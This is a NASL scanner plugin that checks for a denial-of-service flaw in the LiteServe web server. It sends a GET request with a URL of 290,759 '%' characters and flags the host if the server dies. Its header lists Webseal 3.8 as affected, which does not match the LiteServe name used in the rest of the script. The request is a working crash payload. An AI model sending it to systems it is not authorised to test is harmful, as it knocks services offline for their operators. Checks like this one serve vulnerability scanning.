# This script was written by Michel Arboi <arboi@alussinan.org>
#
# GPL
#
# Affected:
# Webseal 3.8
#
# *unconfirmed*

if(description)
{
 script_id(11155);
 script_version ("$Revision: 7190 $");
 script_tag(name:"risk_factor", value:"High");
 
 name = "LiteServe URL Decoding DoS";
 script_name(name);
 
 desc = "
The remote web server dies when an URL consisting of a 
long invalid string of % is sent.

A cracker may use this flaw to make your server crash continually.

Solution : upgrade your server or firewall it.
Risk factor : High"; 



 script_description(desc);
		    
 
 summary = "Sending a long string of % kills LiteServe"; 
 script_summary(summary);
 
 script_category(ACT_DENIAL);
 
 script_copyright("This script is Copyright (C) 2002 Michel Arboi");
 
 family = "Denial of Service";
 script_family(family);
 script_dependencie("find_service.nes", "httpver.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

#

include("http_func.inc");

port = get_http_port(default:80);


if (! get_port_state(port)) exit(0);

if (http_is_dead(port: port)) exit(0);

soc = open_sock_tcp(port);
if (! soc) exit(0);

req = string("GET /", crap(data: "%",length: 290759), " HTTP/1.0\r\n\r\n");
send(socket: soc, data: req);
r = http_recv(socket: soc);
close(soc);
sleep(1);

if (http_is_dead(port: port)) { security_hole(port); }
